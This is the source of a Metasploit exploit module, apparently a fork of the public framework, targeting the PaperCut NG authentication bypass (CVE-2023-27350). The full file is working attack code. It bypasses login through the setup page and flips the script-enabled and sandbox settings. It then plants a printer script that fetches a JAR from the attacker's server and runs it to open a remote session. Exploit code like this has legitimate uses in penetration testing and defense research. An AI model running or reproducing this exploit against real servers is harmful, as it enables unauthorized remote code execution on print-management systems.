adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
T
catatonicprime 3875947f7d Removing unnecessary assignment
2023-05-31 19:17:30 +00:00

255 lines
8.4 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'cgi'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'PaperCut PaperCutNG Authentication Bypass',
'Description' => %q{
This module leverages an authentication bypass in PaperCut NG. If necessary it
updates Papercut configuration options, specifically the 'print-and-device.script.enabled'
and 'print.script.sandboxed' options to allow for arbitrary code execution running in
the builtin RhinoJS engine.
This module logs at most 2 events in the application log of papercut. Each event is tied
to modifcation of server settings.
},
'License' => MSF_LICENSE,
'Author' => ['catatonicprime'],
'References' => [
['CVE', '2023-27350'],
['ZDI', '23-233'],
['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],
['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],
['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software']
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => [ [ 'Automatic Target', {}] ],
'Platform' => [ 'java' ],
'Arch' => ARCH_JAVA,
'Privileged' => true,
'DisclosureDate' => '2023-03-13',
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => '9191',
'SSL' => 'false'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
], self.class
)
@csrf_token = nil
@config_cleanup = []
end
def bypass_auth
# Attempt to generate a session & recover the anti-csrf token for future requests.
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_get' => {
'service' => 'page/SetupCompleted'
}
}
)
return nil unless res && res.code == 200
vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")
# Parse the application version from the response for future decisions.
product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1]
if product_details.nil?
product_details = res.get_html_document.xpath('//span[contains(@class, "version")]')
end
version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)')
@version_major = Integer(version_match[:major])
match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
@csrf_token = match ? match[:csrf] : ''
end
def get_config_option(name)
# 1) do a quickfind (setting the tapestry state)
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'headers' => {
'Origin' => full_uri
},
'vars_post' => {
'service' => 'direct/1/ConfigEditor/quickFindForm',
'sp' => 'S0',
'Form0' => '$TextField,doQuickFind,clear',
'$TextField' => name,
'doQuickFind' => 'Go'
}
}
)
# 2) parse and return the result
return nil unless res && res.code == 200 && (html = res.get_html_document)
return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']"))
return nil unless td.count == 1 && td.text == name
value_input = html.xpath("//input[@name='$TextField$0']")
value_input[0]['value']
end
def set_config_option(name, value, rollback)
# set name:value pair(s)
current_value = get_config_option(name)
if current_value == value
vprint_good("Server option '#{name}' already set to '#{value}')")
return
end
vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'headers' => {
'Origin' => full_uri
},
'vars_post' => {
'service' => 'direct/1/ConfigEditor/$Form',
'sp' => 'S1',
'Form1' => '$TextField$0,$Submit,$Submit$0',
'$TextField$0' => value,
'$Submit' => 'Update'
}
}
)
fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200
# skip storing the cleanup change if this is rolling back a previous change
@config_cleanup.push([name, current_value]) unless rollback
end
def cleanup
super
if @config_cleanup.nil?
return
end
until @config_cleanup.empty?
cfg = @config_cleanup.pop
vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'")
set_config_option(cfg[0], cfg[1], true)
end
end
def primer
payload_uri = get_uri
script = <<~SCRIPT
var urls = [new java.net.URL("#{payload_uri}.jar")];
var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
s;
SCRIPT
# The number of parameters passed changed in version 17.
form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0'
if @version_major > 16
form0 += ',$Submit$1'
end
# 6) Trigger the code execution the printer_id
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'headers' => {
'Origin' => full_uri
},
'vars_post' => {
'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
'sp' => 'S0',
'Form0' => form0,
'enablePrintScript' => 'on',
'$Submit$1' => 'Apply',
'printerId' => 'l1001',
'scriptBody' => script
}
}
)
fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200
end
def check
# For the check command
bypass_success = bypass_auth
if bypass_success.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def exploit
# Main function
# 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
bypass_auth unless @csrf_token
if @csrf_token.nil?
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
# Sandboxing wasn't introduced until version 19
if @version_major >= 19
# 2) Enable scripts, if needed
set_config_option('print-and-device.script.enabled', 'Y', false)
# 3) Disable sandboxing, if needed
set_config_option('print.script.sandboxed', 'N', false)
end
# 5) Select the printer, this loads it into the tapestry session to be modified
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'headers' => {
'Origin' => full_uri
},
'vars_get' => {
'service' => 'direct/1/PrinterList/selectPrinter',
'sp' => 'l1001'
}
}
)
fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stop due to our timeout, this is raised
end
def on_request_uri(cli, request)
vprint_status("Sending payload for requested uri: #{request.uri}")
send_response(cli, payload.raw)
end
end
Reference in New Issue View Git Blame Copy Permalink